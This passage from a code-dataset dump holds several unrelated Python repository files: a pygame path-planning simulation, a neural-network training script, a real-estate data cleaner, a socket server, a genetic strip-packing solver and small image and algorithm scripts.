horizontal_width = map_rect.width // map_size[1]\n vertical_width = map_rect.height // map_size[0]\n\n cell_width = min(horizontal_width, vertical_width)\n\n curr_corner = np.array([map_rect.left, map_rect.top])\n\n cells = [] # used to store all the drawn rectangles\n\n for i in range(map_size[0]):\n cells.append([])\n for j in range(map_size[1]):\n # set cell fill color base on cell status\n cell_status = self.agent.get_cell((i,j))\n if cell_status == MapStatus.AGENT:\n c = self.color_dict[\"blue\"]\n elif cell_status == MapStatus.TARGET:\n c = self.color_dict[\"green\"]\n elif cell_status == MapStatus.BOTH:\n c = self.color_dict[\"yellow\"]\n elif cell_status == MapStatus.OBSTACLE:\n c = self.color_dict[\"brown\"]\n else:\n c = self.color_dict[\"black\"]\n # set location\n rect = pygame.Rect(curr_corner[0], curr_corner[1], cell_width, cell_width)\n cells[-1].append(rect)\n # draw the cell\n pygame.draw.rect(self.screen, c, rect)\n # draw cell border\n pygame.draw.rect(self.screen, self.color_dict[\"gray\"], rect, 1)\n curr_corner += np.array([cell_width,0])\n curr_corner[0] = map_rect.left\n curr_corner += np.array([0,cell_width])\n\n # draw the scan border\n corner = np.array([map_rect.left, map_rect.top])\n corner += np.array([self.agent.pos[1]-1, self.agent.pos[0]-1]) * cell_width\n scan_width = 3 * cell_width\n pygame.draw.rect(self.screen, self.color_dict[\"red\"], pygame.Rect(corner[0], corner[1], scan_width, scan_width), 2)\n\n # draw the agent's planned path\n path = self.agent.get_path()\n if path.shape[0] != 0:\n for k in range(path.shape[0]-1):\n curr_coord = path[k]\n next_coord = path[k+1]\n if self.agent.in_bounds(curr_coord) and self.agent.in_bounds(next_coord):\n pygame.draw.line(self.screen, self.color_dict[\"purple\"], \n cells[curr_coord[0]][curr_coord[1]].center, cells[next_coord[0]][next_coord[1]].center, 3)\n else:\n break\n\n def render_frame(self) -> None:\n if not self.render:\n return\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n\n # clear window\n self.screen.fill(self.color_dict[\"black\"])\n\n sub_figure_width = (self.window_size[0] - (self.render_offset.left + self.render_offset.right) - self.center_col_width) // 2\n sub_fugure_height = self.window_size[1] - (self.render_offset.top + self.render_offset.bottom)\n\n # draw the grid status\n grid_rect = pygame.Rect(self.render_offset.left, self.render_offset.top, \n sub_figure_width, \n sub_fugure_height)\n self.draw_grid(grid_rect)\n\n # grid status label text\n grid_label_rect = pygame.Rect(0, 0, (self.window_size[0]-self.center_col_width)//2, self.render_offset.top)\n self.screen.fill(self.color_dict[\"black\"], grid_label_rect)\n my_font = pygame.font.SysFont(\"Times New Roman\", 30)\n my_text = my_font.render(\"Grid Environment Status\", True, self.color_dict[\"white\"])\n my_rect = my_text.get_rect()\n width = my_rect.width\n height = my_rect.height\n self.screen.blit(my_text, (grid_label_rect.centerx - width//2, grid_label_rect.centery - height//2))\n\n # draw center column\n pygame.draw.rect(self.screen, self.color_dict[\"black\"], \n pygame.Rect((self.window_size[0]-self.center_col_width)//2, 0, self.center_col_width, self.window_size[1]))\n\n # draw the agent's map\n map_rect = pygame.Rect(sub_figure_width + self.center_col_width,\n self.render_offset.top, \n sub_figure_width, \n sub_fugure_height)\n self.draw_map(map_rect)\n\n # map status label text\n map_label_rect = pygame.Rect((self.window_size[0]-self.center_col_width)//2 + self.center_col_width, 0,\n (self.window_size[0]-self.center_col_width)//2, self.render_offset.top)\n self.screen.fill(self.color_dict[\"black\"], map_label_rect)\n my_font = pygame.font.SysFont(\"Times New Roman\", 30)\n my_text = my_font.render(\"Agent Map\", True, self.color_dict[\"white\"])\n my_rect = my_text.get_rect()\n width = my_rect.width\n height = my_rect.height\n self.screen.blit(my_text, (map_label_rect.centerx - width//2, map_label_rect.centery - height//2))\n\n pygame.display.flip()\n self.clock.tick(self.FPS)\n\n\nif __name__ == \"__main__\":\n sim = Simulation(render=True, window_size=(1050, 550), FPS=60, render_offset=Offset(50,0,0,0), center_col_width=50)\n map_width = map_height = 20\n sim.init_grid((map_height, map_width))\n sim.fill_random_grid(probability=0.4, seed=1)\n\n # sim.grid.set_obstacle((7,slice(0,17,None)))\n # sim.grid.set_obstacle((10,slice(0,17,None)))\n # sim.grid.set_obstacle((13,slice(0,17,None)))\n # sim.grid.place_agent((18,10),True)\n # sim.grid.place_target((3,10),True)\n\n sim.init_agent(agent_class=D_star_agent, vision_func=partial(scan_circular, radius=5))\n\n sim.render_frame()\n\n started = False\n while not started:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN: \n started = True\n\n t = time()\n sim.run_sim(manual=False)\n print(\"sim took:\", time() - t)\n\n sim.render_frame()\n\n print(\"Steps taken:\", sim.agent.steps_taken)\n print(\"Distance travelled:\", sim.agent.distance_travelled)\n print(\"Num expanded nodes:\", sim.agent.num_expanded_nodes)\n print(\"Max queue size:\", sim.agent.max_queue_size)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n","repo_name":"ben441318936/PlanningAndControl","sub_path":"GridWorld/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":14173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9947314724","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom process import get_data\nfrom predict import softmax\n\ndef y2indicator(y, K):\n N = len(y)\n ind = np.zeros((N, K))\n for i in range(N):\n ind[i, y[i]] = 1\n return ind\n\ndef forward(X, W1, b1, W2, b2):\n Z = np.tanh(X.dot(W1) + b1)\n return softmax(Z.dot(W2) + b2) , Z\n\ndef predict(P_Y_given_X):\n return np.argmax(P_Y_given_X, axis=1)\n\ndef classification_rate(Y, P):\n return np.mean(Y == P)\n\ndef cross_entropy(Y, pY):\n return -np.mean(Y * np.log(pY))\n\ndef main():\n\n Xtrain, Ytrain, Xtest, Ytest = get_data()\n\n D = Xtrain.shape[1] # num rows\n K = len(set(Ytrain)|set(Ytest)) # num unique outputs\n M = 5 # arbitrary\n\n Ytrain_ind = y2indicator(Ytrain, K)\n Ytest_ind = y2indicator(Ytest, K)\n\n # randomly initialize weights\n W1 = np.random.randn(D, M)\n b1 = np.zeros(M)\n W2 = np.random.randn(M, K)\n b2 = np.zeros(K)\n\n # training loop\n train_costs = []\n test_costs = []\n learning_rate = 0.001 # arbitrary \n epochs = 5000 # arbitrary\n\n for i in range(epochs):\n pYtrain, Ztrain = forward(Xtrain, W1, b1, W2, b2)\n pYtest, Ztest = forward(Xtest, W1, b1, W2, b2)\n\n ctrain = cross_entropy(Ytrain_ind, pYtrain)\n ctest = cross_entropy(Ytest_ind, pYtest)\n\n train_costs.append(ctrain)\n test_costs.append(ctest)\n\n # gradients (optional)\n gW2 = Ztrain.T.dot(pYtrain - Ytrain_ind)\n gb2 = (pYtrain - Ytrain_ind).sum(axis=0)\n dZ = (pYtrain - Ytrain_ind).dot(W2.T) * (1 - Ztrain * Ztrain) # hold variable\n gW1 = Xtrain.T.dot(dZ)\n gb1 = dZ.sum(axis=0)\n \n # updating weights\n W2 -= learning_rate * gW2\n b2 -= learning_rate * gb2\n W1 -= learning_rate * gW1\n b1 -= learning_rate * gb1\n\n if i % 1000 == 0:\n print(i, ctrain, ctest)\n\n pYtrain, _ = forward(Xtrain, W1, b1, W2, b2)\n pYtest, _ = forward(Xtest, W1, b1, W2, b2)\n\n acc_test = classification_rate(Ytest, predict(pYtest))\n acc_train = classification_rate(Ytrain, predict(pYtrain))\n print('Final train classification rate:', acc_train) \n print('Final test classification rate:', acc_test) \n\n\n plt.plot(train_costs, label = 'train cost')\n plt.plot(test_costs, label = 'test cost')\n plt.legend()\n plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"jacksauser/ML-and-Computer-Vision","sub_path":"neural_network_train.py","file_name":"neural_network_train.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12654100262","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom IPython.display import display\r\nimport openpyxl\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n#file_name = \"output_all_students_Train_v10.xlsx\"\r\n#df = pd.read_excel(file_name)\r\n#display(df.head())\r\n\r\ndef prepare_data(df):\r\n df.columns = df.columns.str.strip() #clean up all unnecessary spaces\r\n df.dropna(subset=['price'], inplace=True) #delete all rows without price\r\n df.reset_index(drop=True, inplace=True) #reset index\r\n\r\n #Replace values in the 'price' column\r\n def convert_price(value):\r\n numeric_value = re.search(r'(\\d[\\d,]*)', str(value))\r\n if numeric_value:\r\n numeric_value = numeric_value.group(1).replace(',', '')\r\n return int(numeric_value)\r\n else:\r\n return None\r\n\r\n df['price'] = df['price'].apply(convert_price)\r\n\r\n #Clean Area value's \r\n def clean_area_value(value):\r\n if isinstance(value, str):\r\n cleaned_value = re.sub(r'[^0-9.]', '', value) # Remove non-numeric characters except dot\r\n try:\r\n return float(cleaned_value)\r\n except ValueError:\r\n return None\r\n elif isinstance(value, (int, float)):\r\n return float(value)\r\n else:\r\n return None\r\n\r\n df[\"Area\"] = df[\"Area\"].apply(clean_area_value)\r\n\r\n #display(df['Area'].unique()) #(df)\r\n #making columns price and area numeric\r\n #df['Area'] = df['Area'].str.extract(r'(\\d+)').astype(float)\r\n #df['price'] = pd.to_numeric(df['price'], errors='coerce').astype(float)\r\n\r\n\r\n #Using RE to drop all 'סימני פיסוק'\r\n pattern = r'[^\\u0590-\\u05FF\\s\\d]'\r\n columns_to_clean = ['Street', 'city_area'] #'description'\r\n df[columns_to_clean] = df[columns_to_clean].replace(to_replace=pattern, value='', regex=True)\r\n df[\"description\"] = df[\"description\"].str.replace(r\"[^A-Za-zא-ת0-9.\\\"']\", \" \", regex=True)\r\n\r\n\r\n #df[\"description\"] = df[\"description\"].str.replace(r\"[^A-Za-zא-ת0-9.\\\"']\", \" \", regex=True)\r\n #df.description.unique()\r\n\r\n #Creating the new columns 'floor' and 'total_floors' and extracting the correct values to each column from the column 'floor_out_of'df['floor'] = np.nan\r\n df['floor'] = np.nan\r\n df['total_floors'] = np.nan\r\n df['floor_out_of'] = df['floor_out_of'].astype(str)\r\n matches = df['floor_out_of'].str.extract(r'(\\d+).*?(\\d+)')\r\n df['floor'] = matches[0].astype(float)\r\n df['total_floors'] = matches[1].astype(float)\r\n df.loc[df['type'].isin([\"קוטג'\", 'בית פרטי', 'מגרש', 'דו משפחתי', 'נחלה', \"קוטג' טורי\", 'דירת גן']), ['floor']] = 0\r\n #df = df.drop('floor_out_of', axis=1)\r\n\r\n #fill 0 where num_of_images is null\r\n df['num_of_images'].fillna(0, inplace=True)\r\n\r\n #replacing the values in entranceDate that are not dates with a built-in fixed date that we can identify later\r\n df['entranceDate'] = df['entranceDate'].replace('גמיש', '1996-09-13 00:00:00').replace('לא צויין', '1999-03-26 00:00:00').replace('מיידי', '2022-11-16 00:00:00')\r\n df['entranceDate'] = df['entranceDate'].apply(lambda x: '1996-09-13 00:00:00' if isinstance(x, str) and x.strip() == 'גמיש' else x)\r\n df['entranceDate'] = pd.to_datetime(df['entranceDate'])\r\n\r\n #making entranceDate categorial column\r\n above_year = 'above_year'\r\n months_6_12 = 'months_6_12'\r\n less_than_6_months = 'less_than_6_months'\r\n flexible = 'flexible'\r\n not_defined = 'not_defined'\r\n\r\n current_date = datetime.now()\r\n\r\n def replace_date(row):\r\n x = row['entranceDate']\r\n if x.year != 1996 and x.year != 1999 and x.year != 2022 and abs(current_date - x) > timedelta(days=365):\r\n return above_year\r\n elif x.year != 1996 and x.year != 1999 and x.year != 2022 and timedelta(days=182) <= abs(current_date - x) < timedelta(days=365):\r\n return months_6_12\r\n elif x.year != 1996 and x.year != 1999 and x.year != 2022 and current_date - x < timedelta(days=182):\r\n return less_than_6_months\r\n elif x == datetime(1996, 9, 13):\r\n return flexible\r\n elif x == datetime(1999, 3, 26): #or x == datetime(2022, 11, 16):\r\n return not_defined\r\n elif x.year == 2022:\r\n return less_than_6_months\r\n else:\r\n return x\r\n\r\n df['entranceDate'] = df.apply(replace_date, axis=1)\r\n\r\n #Cleaning room_number column\r\n replacement_mapping = {\r\n r'35': 3.5,\r\n r'5.5 חד׳': 5.5,\r\n r'4 חד׳': 4,\r\n r'2 חד׳': 2,\r\n r'3.5 חד׳': 3.5,\r\n r'5 חד׳': 5,\r\n r'3 חד׳': 3,\r\n r'6 חד׳': 6,\r\n r'6.5 חד׳': 6.5,\r\n r'4.5 חד׳': 4.5,\r\n r'2.5 חד׳': 2.5,\r\n r'8 חד׳': 8,\r\n r'7 חד׳': 7,\r\n r'-': np.nan,\r\n r'7.5 חד׳': 7.5,\r\n r'9.5 חד׳': 9.5,\r\n r\"4 חד'\": 4,\r\n r'10 חד׳': 10,\r\n r\"3 חד'\": 3,\r\n r\"5 חד'\": 5,\r\n r\"6 חד'\": 6,\r\n r\"^\\['6.5'\\]$\": 6.5,\r\n r\"^\\['3'\\]$\": 3,\r\n r\"^\\['4'\\]$\": 4,\r\n r\"^\\['4.5'\\]$\": 4.5,\r\n r\"^\\['5'\\]$\": 5,\r\n r\"^\\['7.5'\\]$\": 7.5,\r\n r\"^\\['7'\\]$\": 7,\r\n r\"^\\['6'\\]$\": 6\r\n }\r\n\r\n df['room_number'] = df['room_number'].replace(replacement_mapping, regex=True)\r\n df['room_number'] = df['room_number'].astype(float)\r\n\r\n\r\n ### Converting the columns 'hasElevator', 'hasParking', 'hasBars', 'hasStorage', 'hasAirCondition', 'hasBalcony', 'hasMamad' and 'handicapFriendly' to a boolean columns\r\n replace_values = [True, 'כן', 'יש', 'יש מעלית', 'yes', 'יש חניה', 'יש חנייה', 'יש סורגים', 'יש מחסן', 'יש מיזוג אויר', 'יש מיזוג אוויר', 'יש מרפסת', 'יש ממ\"ד', 'יש ממ\" ד', 'נגיש', 'נגיש לנכים', 'יש ממ״ד']\r\n\r\n df['hasElevator'] = df['hasElevator'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasParking'] = df['hasParking'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasBars'] = df['hasBars'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasStorage'] = df['hasStorage'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasAirCondition'] = df['hasAirCondition'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasBalcony'] = df['hasBalcony'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasMamad'] = df['hasMamad'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['handicapFriendly'] = df['handicapFriendly'].replace(replace_values, 1).astype(bool).astype(int)\r\n\r\n replace_False_values = [False, 'לא', 'אין', 'אין מעלית', 'no', 'אין חניה', 'אין חנייה', 'אין סורגים', 'אין מחסן', 'אין מיזוג אויר', 'אין מיזוג אוויר', 'אין מרפסת', 'אין ממ\"ד', 'אין ממ\" ד', 'לא נגיש', 'לא נגיש לנכים', 'אין ממ״ד']\r\n\r\n df['hasElevator'] = df['hasElevator'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasParking'] = df['hasParking'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasBars'] = df['hasBars'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasStorage'] = df['hasStorage'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasAirCondition'] = df['hasAirCondition'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasBalcony'] = df['hasBalcony'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasMamad'] = df['hasMamad'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['handicapFriendly'] = df['handicapFriendly'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n\r\n #Preapering condition column to be categorial\r\n df[\"condition\"] = df[\"condition\"].replace([\"לא צויין\",\"nan\", \"None\",\"False\"], 'not_defind')\r\n df['condition'] = df['condition'].replace({'משופץ': 'renovated' , 'שמור': 'maintained' , 'חדש': 'new' , 'ישן': 'old' , 'דורש שיפוץ': 'requires_renovation'})\r\n\r\n #Cleaning City\r\n df[\"City\"] = df[\"City\"].replace('נהרייה', 'נהריה')\r\n\r\n #cleaning street column\r\n df['Street'] = df['Street'].replace('None', np.nan)\r\n df['Street'] = df['Street'].str.replace(r\"\\['(.*?)'\\]\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"\\[\\'(.*?)\\'\\]\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"(\\w) '\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"' (\\w)\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace('רמב ן', 'רמב\"ן')\r\n df['Street'] = df['Street'].str.replace('רחבת חי ל', 'רחבת חיל')\r\n df['Street'] = df['Street'].str.replace('פינס 5', 'פינס')\r\n df['Street'] = df['Street'].str.strip()\r\n df['Street'] = df['Street'].str.replace('עין נטפים\\n', 'עין נטפים') # Replace 'עין נטפים\\n' with 'עין נטפים'\r\n\r\n\r\n df['city_area'] = df['city_area'].str.strip()\r\n\r\n #clean publishedDays\r\n df['publishedDays'] = df['publishedDays'].replace('60+', '60')\r\n df['publishedDays'] = df['publishedDays'].replace('None', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('None ', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('-', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('חדש!', '0')\r\n df['publishedDays'] = df['publishedDays'].replace('חדש', '0')\r\n df['publishedDays'] = df['publishedDays'].replace('Nan', np.nan)\r\n\r\n #Making furniture column categorial\r\n replace_dict = {\r\n 'חלקי': 'partial',\r\n 'מלא': 'full',\r\n 'אין': 'nothing',\r\n 'לא צויין': 'not_defined'\r\n }\r\n\r\n df['furniture'].replace(replace_dict, inplace=True)\r\n\r\n #Sorting the columns before selecting the featuers\r\n#passing_price_column = clean_df['price'] # Extract the 'price' column\r\n#clean_df = clean_df.drop(columns=['price']) # Drop the 'price' column from the DataFrame\r\n#clean_df['price'] = passing_price_column # Add the 'price' column back at the end\r\n#display(clean_df.head())\r\n\r\n#Creating vizulization\r\n#Compute the correlation matrix\r\n\r\n#+\r\n\r\n#numerical_columns = ['Area', 'room_number', 'floor', 'hasElevator', 'hasBars', 'hasAirCondition', 'handicapFriendly', 'hasParking', 'hasBalcony', 'hasMamad', 'hasStorage', 'price']\r\n\r\n#new_df = clean_df[numerical_columns].copy()\r\n\r\n# Compute the correlation matrix on the encoded DataFrame\r\n#correlation_matrix = new_df.corr()\r\n#correlation_matrix = clean_df.corr()\r\n#plt.figure(figsize=(16, 8))\r\n#sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm')\r\n#plt.title('Correlation Matrix Heatmap')\r\n#plt.show()\r\n\r\n#Checking the predict for every numerical value\r\n# Select the numerical columns\r\n#columns = ['Area','room_number', 'floor', 'price', 'hasElevator', 'hasParking', 'hasBars', 'hasStorage', 'hasAirCondition', 'hasBalcony', 'hasMamad', 'handicapFriendly']\r\n\r\n# Calculate the Predictive Power Score for each binary column\r\n#feature_scores = {}\r\n#for column in columns:\r\n# score = pps.score(clean_df, column, 'price')\r\n# feature_scores[column] = score['ppscore']\r\n#sorted_features = sorted(feature_scores.items(), key=lambda x: x[1], reverse=True) # Sort the features by Predictive Power Score\r\n#print(\"Predictive Power Scores:\") # Print the features and their corresponding Predictive Power Scores\r\n#for feature, score in sorted_features:\r\n# print(f\"{feature}: {score}\")\r\n\r\n#Creating Chi-square test for categorical features\r\n#from scipy.stats import chi2_contingency\r\n#categorical_columns = ['City', 'type', 'city_area', 'condition', 'furniture', 'entranceDate']\r\n#selected_features = []\r\n#results = []\r\n#print(\"Chi-square Test Results:\")\r\n#for column in categorical_columns:\r\n# contingency_table = pd.crosstab(clean_df[column], clean_df['price'])\r\n# chi2, p_value, _, _ = chi2_contingency(contingency_table)\r\n# results.append({'Feature': column, 'Chi2': chi2, 'P-value': p_value})\r\n# # Set a significance level (e.g., 0.05) to determine feature importance\r\n# if p_value < 0.05:\r\n# selected_features.append(column)\r\n#print(\"Selected Categorical Features:\", selected_features)\r\n#print(pd.DataFrame(results))\r\n \r\n df.dropna(subset=['price'], inplace=True)\r\n df.dropna(subset=['Area'], inplace=True)\r\n df = df.drop_duplicates()\r\n columns_to_drop = ['Street', 'number_in_street', 'num_of_images', 'floor_out_of', 'hasElevator', 'hasBars', 'hasAirCondition', 'handicapFriendly', 'publishedDays', 'description', 'total_floors']\r\n df = df.drop(columns_to_drop, axis=1)\r\n df = df.replace('', np.nan).dropna()\r\n df = df.dropna()\r\n df.reset_index(drop=True, inplace=True)\r\n\r\n #file_out_name = \"clean_df.xlsx\"\r\n #df.to_excel(file_out_name, index=False)\r\n\r\n return df\r\n","repo_name":"DanielFrei316/Final_Task","sub_path":"madlan_data_prep.py","file_name":"madlan_data_prep.py","file_ext":"py","file_size_in_byte":13059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29004789086","text":"#!/usr/bin/python # This is server.py file\n\nimport json\nimport socket # Import socket module\nimport pickle\nimport pandas as pd\nimport numpy as np\n\nHEADERSIZE = 10\n\ndef nodeserv(transfdata):\n tfdata = transfdata.values.tolist()\n tfdatajson = json.dumps(tfdata)\n #print(tfdata)\n sn = socket.socket()\n hostn ='localhost'\n portn = 14564\n sn.bind((hostn, portn))\n print('nodeserv is running')\n sn.listen(5)\n print('after listening')\n while True:\n cn, addrn = sn.accept()\n print('Got connection from', addrn)\n #cn.send(bytes('Thank you for connecting','utf-8'))\n cn.send(bytes(tfdatajson, 'utf-8'))\n print(cn.recv(1024))\n cn.close()\n\ns = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 12345 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\nprint('working now')\ns.listen(5) # Now wait for client connection.\nwhile True:\n c, addr = s.accept() # Establish connection with client.\n print('Got connection from', addr)\n c.send(bytes('Thank you for connecting','utf-8'))\n\n while True:\n full_msg = b''\n new_msg = True\n while True:\n msg = c.recv(4096)\n print(\"receive working\")\n if new_msg:\n print(\"new msg len:\", msg[:HEADERSIZE])\n msglen = int(msg[:HEADERSIZE])\n new_msg = False\n print(f\"full message length: {msglen}\")\n full_msg += msg\n print(len(full_msg))\n if len(full_msg) -HEADERSIZE == msglen:\n print(\"full msg recvd\")\n #print(full_msg[HEADERSIZE:])\n print(type(pickle.loads(full_msg[HEADERSIZE:])))\n new_msg = True\n full_msg = b\"\"\n\n #print(pickle.loads(data))\n #nodeserv(pickle.loads(data))\n\nc.close() # Close the connection\n","repo_name":"soundarya98/Fascia_nucleus","sub_path":"Fascia_pipeline/AWS/realtmodel.py","file_name":"realtmodel.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41526349042","text":"import numpy as np\nimport Plotter\n\n\nclass StripPackagingNotRotations:\n W = 100\n Pc = 0.65\n Pm = 0.05\n Np = 50\n n = 20\n anchos = []\n alturas = []\n show_figure = False\n\n # Constructor\n def __init__(self, n=10, gens=5000, anchos=None, alturas=None, max_width=100, seed=0, show_figure=True):\n np.random.seed(seed)\n self.W = 100\n self.Pc = 0.65\n self.Pm = 0.05\n self.Np = 50\n self.n = n\n self.gens = gens\n self.W = max_width\n self.show_figure = show_figure\n\n # Control for empty data\n if alturas is None or anchos is None and n != 0:\n self.anchos = np.random.randint(10, 50, n)\n self.alturas = np.random.randint(10, 75, n)\n else:\n self.anchos = anchos\n self.alturas = alturas\n\n # Genero la población como permutaciones de n elementos\n def _generar_poblacion(self, n):\n poblacion = np.zeros((self.Np, n))\n for i in range(self.Np):\n individuo = np.random.permutation(n)\n poblacion[i] = individuo\n return poblacion\n\n # Función de fitness que devuelve la altura total de una distribución de rectángulos\n def _fitness(self, e):\n ancho_acum = 0\n altura_actual = 0\n altura_total = 0\n\n for i in e:\n i = int(i)\n if self.anchos[i] + ancho_acum <= self.W:\n ancho_acum += self.anchos[i]\n if self.alturas[i] > altura_actual:\n altura_actual = self.alturas[i]\n else:\n altura_total += altura_actual\n ancho_acum = self.anchos[i]\n altura_actual = self.alturas[i]\n\n altura_total += altura_actual\n return altura_total\n\n # Selecciona dos individuos al azar y elige el mejor\n def _seleccionar_padre(self, poblacion):\n indice_padre1 = np.random.randint(0, self.Np - 1)\n indice_padre2 = np.random.randint(0, self.Np - 1)\n while indice_padre1 == indice_padre2:\n indice_padre2 = np.random.randint(0, self.Np - 1)\n # Selecciono dos padres al azar\n padre1 = poblacion[indice_padre1]\n padre2 = poblacion[indice_padre2]\n # Elijo al padre con la menor función de fitness\n if self._fitness(padre1) <= self._fitness(padre2):\n return padre1\n else:\n return padre2\n\n # Operador de crossover PMX\n def _pmx(self, padre1, padre2, n):\n hijo = np.zeros(n)\n punto1 = np.random.randint(1, n - 1)\n punto2 = np.random.randint(1, n - 1)\n while (punto1 == punto2):\n punto2 = np.random.randint(1, n - 1)\n # Acomodo los índices si están cruzados\n if punto1 > punto2:\n aux = punto2\n punto2 = punto1\n punto1 = aux\n # Reparto los segmentos\n hijo[:punto1] = padre1[:punto1]\n hijo[punto1:punto2] = padre2[punto1:punto2]\n hijo[punto2:] = padre1[punto2:]\n # Busco aquellos valores que no fueron copiados\n for i in range(punto1, punto2):\n if not (padre1[i] in padre2[punto1:punto2]):\n index = self._indice(padre1, padre2[i])\n while punto1 <= index < punto2:\n index = self._indice(padre1, hijo[index])\n hijo[index] = padre1[i]\n return hijo\n\n # Mutación mediante intercambio de dos genes al azar\n def _mutacion(self, individuo):\n index1 = np.random.randint(0, self.n)\n index2 = np.random.randint(0, self.n)\n while index1 == index2:\n index2 = np.random.randint(0, self.n)\n aux = individuo[index1]\n individuo[index1] = individuo[index2]\n individuo[index2] = aux\n\n return individuo\n\n # Retorna el mejor individuo de su población\n def _mejor_individuo(self, poblacion):\n resultado = poblacion[0]\n valor = self._fitness(poblacion[0])\n\n for i in range(1, self.Np):\n nuevo_valor = self._fitness(poblacion[i])\n if nuevo_valor < valor:\n valor = nuevo_valor\n resultado = poblacion[i]\n\n return np.copy(resultado)\n\n # Dado un individuo y un valor me devuelve la posición en la cual se encuentra\n def _indice(self, individuo, valor):\n for i in range(len(individuo)):\n if individuo[i] == valor:\n return i\n\n # Algoritmo principal\n def run(self):\n n = self.n\n gen = self.gens\n\n poblacion = self._generar_poblacion(n)\n nueva_poblacion = np.zeros((self.Np, n))\n resultado = self._mejor_individuo(poblacion)\n\n if self.show_figure:\n print(\"Ancho de los rectángulos: \", end='')\n print(self.anchos)\n print(\"Altura de los rectángulos: \", end='')\n print(self.alturas)\n print(\"-----------------------------------------\")\n print(\"Primer mejor resultado: \", end='')\n print(resultado)\n\n # Plot Individual\n if self.show_figure:\n Plotter.PlotterStrip().plot_individual_with_no_rotation(individual=resultado, max_width=self.W,\n heights=self.alturas, widths=self.anchos,\n title=\"Strip Packaging Problem - No Rotations \\n\"\n \"Mejor solución - Inicio\")\n if self.show_figure:\n print(\"La altura total es: \", end='')\n print(self._fitness(resultado))\n print(\"-----------------------------------------\")\n\n for i in range(gen):\n for j in range(self.Np):\n # Realizo crossover\n if np.random.random() <= self.Pc:\n padre1 = self._seleccionar_padre(poblacion)\n padre2 = self._seleccionar_padre(poblacion)\n hijo = self._pmx(padre1, padre2, n)\n else:\n hijo = poblacion[j]\n\n # Realizo mutacion\n if np.random.random() <= self.Pm:\n hijo = self._mutacion(hijo)\n # Agrego a la nueva población\n nueva_poblacion[j] = hijo\n\n poblacion = nueva_poblacion\n mejor_actual = self._mejor_individuo(poblacion)\n if self._fitness(mejor_actual) < self._fitness(resultado):\n resultado = np.copy(mejor_actual)\n\n if self.show_figure:\n print(\"El orden de rectángulos es: \", end='')\n print(resultado)\n\n # Plot Individual\n if self.show_figure:\n Plotter.PlotterStrip().plot_individual_with_no_rotation(individual=resultado, max_width=self.W,\n heights=self.alturas, widths=self.anchos,\n title = \"Strip Packaging Problem - No Rotations \\n\"\n \"Mejor solución - Final\")\n if self.show_figure:\n print(\"La altura total es: \", end='')\n print(self._fitness(resultado))\n\n # Return best individual and best value\n return resultado, self._fitness(resultado)\n","repo_name":"meganmaguire/SPP-GA","sub_path":"AGnr.py","file_name":"AGnr.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12191570967","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(\"lisa.jpeg\")\nw = img.shape[0]\nh = img.shape[1]\n\nzoom = np.zeros((w,h,3), np.uint8)\nwz = zoom.shape[0]\nhz = zoom.shape[1]\n\nprint(\"original\",w,h)\nprint(\"zoomed\",wz,hz)\n\nfor i in range(wz):\n for j in range(hz):\n for k in range(3):\n zoom[i][j][k] = img[round(i/3)+80][round(j/3)+300][k]\n\ncv2.imshow('MY Image',zoom)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\ncv2.imwrite(\"lisa_result_1.jpg\",zoom)\n\n","repo_name":"jayin92/NYCU-cv-and-uav","sub_path":"lab01/interpolation1.py","file_name":"interpolation1.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17195955507","text":"n, s = map(int, input().split())\n\nnumbers = list(map(int, input().split()))\n\nstart = 0\nend = 0\n\nresult = int(1e9)\ntmp = numbers[end]\nwhile True:\n if tmp >= 